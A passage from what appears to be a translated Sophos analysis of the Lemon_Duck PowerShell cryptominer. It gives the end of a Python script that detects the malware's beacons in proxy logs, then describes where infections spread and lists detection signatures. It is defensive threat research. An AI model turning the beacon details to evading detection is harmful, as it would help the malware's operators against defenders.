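    for url in urls:
        params = parse_beacon(url)
        if params is not None:
            found.append(beacon_summary(params))
    return found


if __name__ == "__main__":
    for summary in find_beacons(CONSTRUCTED_PROXY_LOG):
        print(summary)
```

Because the GUID is the machine UUID and ID is the computer name, the summary also gives you the host to isolate without any further lookup.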
Threat trends
SophosLabs has monitored this malware's network traffic and built a database of compromised machines. Based on the number of compromised machines in our telemetry, we suspect the attacks originated in Asia, but they have now spread to every continent.
Infected machines around the world, geolocated by their IP addresses
Detection coverage
Sophos detects the Lemon_Duck PowerShell components with the following signatures:
· HPmal/PowDld-B – core miner component
· Mal/PshlJob-A – task files from past campaigns + the MS-SQL brute-force task file
· Mal/MineJob-C – task file created by the EternalBlue exploitation
· Mal/MineJob-B – task-file persistence
This article is translated from: https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/